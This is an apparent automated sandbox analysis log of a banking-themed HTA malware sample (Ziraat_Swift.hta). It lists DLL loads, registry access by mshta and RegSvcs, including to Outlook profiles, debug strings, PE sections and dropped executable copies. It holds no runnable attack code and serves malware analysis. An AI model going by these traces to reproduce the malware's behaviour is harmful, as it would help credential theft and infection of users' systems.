                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Ziraat_Swift.htaStatic file information: File size 2325905 > 1048576
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: x.exe, 00000001.00000003.1727383425.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdbI source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1862089697.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2384907802.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1807821969.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: x.exe, 00000001.00000003.1732725251.0000000003E30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2099445651.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2177924834.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroCEF\AcroCEF.pdb source: alg.exe, 00000003.00000003.1844352415.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1764935316.0000000001530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2161039074.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                  Source: AppVClient.exe.1.drStatic PE information: 0xE7EC34A7 [Sun Apr 19 22:01:11 2093 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00404B37 LoadLibraryA,GetProcAddress,1_2_00404B37
                  Source: armsvc.exe.1.drStatic PE information: section name: .didat
                  Source: alg.exe.1.drStatic PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gehcont
                  Source: elevation_service.exe.3.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.3.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.3.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.3.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe.3.drStatic PE information: section name: malloc_h
                  Source: elevation_service.exe0.3.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.3.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.3.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.3.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.3.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe.3.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.3.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.3.drStatic PE information: section name: _RDATA
                  Source: unpack200.exe.3.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .00cfg
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .gxfg
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .retplne
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: _RDATA
                  Source: cookie_exporter.exe.3.drStatic PE information: section name: .00cfg
                  Source: cookie_exporter.exe.3.drStatic PE information: section name: .gxfg
                  Source: cookie_exporter.exe.3.drStatic PE information: section name: .retplne
                  Source: cookie_exporter.exe.3.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.3.drStatic PE information: section name: .00cfg
                  Source: identity_helper.exe.3.drStatic PE information: section name: .gxfg
                  Source: identity_helper.exe.3.drStatic PE information: section name: .retplne
                  Source: identity_helper.exe.3.drStatic PE information: section name: _RDATA
                  Source: identity_helper.exe.3.drStatic PE information: section name: malloc_h
                  Source: setup.exe.3.drStatic PE information: section name: .00cfg
                  Source: setup.exe.3.drStatic PE information: section name: .gxfg
                  Source: setup.exe.3.drStatic PE information: section name: .retplne
                  Source: setup.exe.3.drStatic PE information: section name: LZMADEC
                  Source: setup.exe.3.drStatic PE information: section name: _RDATA
                  Source: setup.exe.3.drStatic PE information: section name: malloc_h
                  Source: Acrobat.exe.3.drStatic PE information: section name: .didat
                  Source: Acrobat.exe.3.drStatic PE information: section name: _RDATA
                  Source: AcroCEF.exe.3.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe.3.drStatic PE information: section name: _RDATA
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: .00cfg
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: .gxfg
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: .retplne
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: CPADinfo
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: LZMADEC
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: _RDATA
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: malloc_h
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .00cfg
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .gxfg
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .retplne
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: LZMADEC
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: _RDATA
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: malloc_h
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: .00cfg
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: .gxfg
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: .retplne
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: CPADinfo
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: _RDATA
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe.3.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe.3.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe.3.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe.3.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe.3.drStatic PE information: section name: malloc_h
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: .00cfg
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: .gxfg
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: .retplne
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: _RDATA
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: malloc_h
                  Source: pwahelper.exe0.3.drStatic PE information: section name: .00cfg
                  Source: pwahelper.exe0.3.drStatic PE information: section name: .gxfg
                  Source: pwahelper.exe0.3.drStatic PE information: section name: .retplne
                  Source: pwahelper.exe0.3.drStatic PE information: section name: _RDATA
                  Source: pwahelper.exe0.3.drStatic PE information: section name: malloc_h
                  Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: _RDATA
                  Source: AcroCEF.exe0.3.drStatic PE information: section name: .didat
                  Source: AcroCEF.exe0.3.drStatic PE information: section name: _RDATA
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: .didat
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: _RDATA
                  Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: section name: .didat
                  Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .didat
                  Source: AppVLP.exe.3.drStatic PE information: section name: .c2r
                  Source: OneDriveSetup.exe.3.drStatic PE information: section name: .didat
                  Source: AdobeCollabSync.exe.3.drStatic PE information: section name: .didat
                  Source: AdobeCollabSync.exe.3.drStatic PE information: section name: _RDATA
                  Source: adobe_licensing_wf_acro.exe.3.drStatic PE information: section name: _RDATA
                  Source: adobe_licensing_wf_helper_acro.exe.3.drStatic PE information: section name: _RDATA
                  Source: 64BitMAPIBroker.exe.3.drStatic PE information: section name: _RDATA
                  Source: MSRMSPIBroker.exe.3.drStatic PE information: section name: .didat
                  Source: MSRMSPIBroker.exe.3.drStatic PE information: section name: .msvcjmc
                  Source: Acrobat.exe0.3.drStatic PE information: section name: .didat
                  Source: setup.exe0.3.drStatic PE information: section name: .didat
                  Source: setup.exe0.3.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046848F push FFFFFF8Bh; iretd 1_2_00468491
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042E70F push edi; ret 1_2_0042E711
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042E828 push esi; ret 1_2_0042E82A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00428945 push ecx; ret 1_2_00428958
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042EA03 push esi; ret 1_2_0042EA05
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042EAEC push edi; ret 1_2_0042EAEE
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00402F12 push es; retf 1_2_00402F13
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B0CAh; ret 1_2_00A7B061
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B30Dh; ret 1_2_00A7B1E6
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B2F2h; ret 1_2_00A7B262
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B255h; ret 1_2_00A7B2ED
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B2D0h; ret 1_2_00A7B346
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7B180 push 00A7B37Fh; ret 1_2_00A7B3B7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A7520C push 00A7528Fh; ret 1_2_00A7522D
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9852Eh; ret 1_2_00A97F3A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98514h; ret 1_2_00A97F66
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A97E66h; ret 1_2_00A98057
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9817Ah; ret 1_2_00A9808B
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A982E5h; ret 1_2_00A980D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9826Ah; ret 1_2_00A9819E
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9849Ch; ret 1_2_00A981E4
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98321h; ret 1_2_00A982E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A97FBFh; ret 1_2_00A9831F
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A97FA8h; ret 1_2_00A9834C
